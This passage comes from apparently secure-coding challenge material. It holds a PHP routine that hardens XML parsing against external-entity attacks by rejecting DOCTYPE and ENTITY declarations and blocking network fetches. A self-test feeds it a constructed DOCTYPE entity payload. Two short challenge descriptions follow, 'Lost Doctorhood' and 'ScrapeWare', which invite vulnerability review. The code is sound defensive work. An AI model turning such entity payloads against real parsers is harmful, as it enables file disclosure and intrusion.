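    // DOCTYPE removes external entities and recursive-entity blowups in one
    // check, independent of libxml version or loader settings.
    if (stripos($raw, '<!DOCTYPE') !== false || stripos($raw, '<!ENTITY') !== false) {
        return null;
    }
    // libxml_disable_entity_loader() is deprecated since PHP 8.0, where the
    // external loader is already off by default; keep it only for older runtimes.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);                 // parser errors stay server-side
    // LIBXML_NONET forbids network fetches during parsing. Never add
    // LIBXML_NOENT: despite its name, that flag turns entity substitution ON.
    $xml = simplexml_load_string($raw, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    return $xml === false ? null : $xml;
}

// Read one child element as a bounded string. The handlers' own
// `(string) $xml->field ?? ''` casts first, so the `??` never sees a null;
// isset() on the SimpleXMLElement is the reliable presence test.
function xml_field(SimpleXMLElement $xml, string $name, int $maxLen = 256): ?string
{
    if (!isset($xml->{$name})) {
        return null;
    }
    $value = (string) $xml->{$name};
    return strlen($value) <= $maxLen ? $value : null;
}

// Constructed inputs: the benign login shape, then a document carrying a
// DOCTYPE with an internal entity, which is rejected before parsing starts.
$ok  = parse_untrusted_xml('<login><username>rick</username><password>x</password></login>');
$bad = parse_untrusted_xml('<!DOCTYPE l [<!ENTITY e "x">]><login><username>&e;</username></login>');
var_dump($ok !== null && xml_field($ok, 'username') === 'rick');
var_dump($bad === null);
```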

Lost Doctorhood

Please check the note.md file first for more information. In a forgotten corner of the digital world, a system built to safeguard knowledge now stands exposed to hidden threats. A mysterious breach has left traces of intrusion—anomalies in the database, loopholes in security, and a silent attempt at deeper control. Can you uncover the vulnerabilities, restore order, and secure the system against future exploitation? Examine the logic, fortify its defenses, and ensure no hidden threats remain. The system’s fate is in your hands—will you heal its wounds or let the breach grow unchecked?

ScrapeWare

Our brand new SaaS product Scrapeware is almost ready for production. We currently have a beta instance of the product live. Could you review the application to find any major vulnerabilities that can lead to the compromise of the live instance?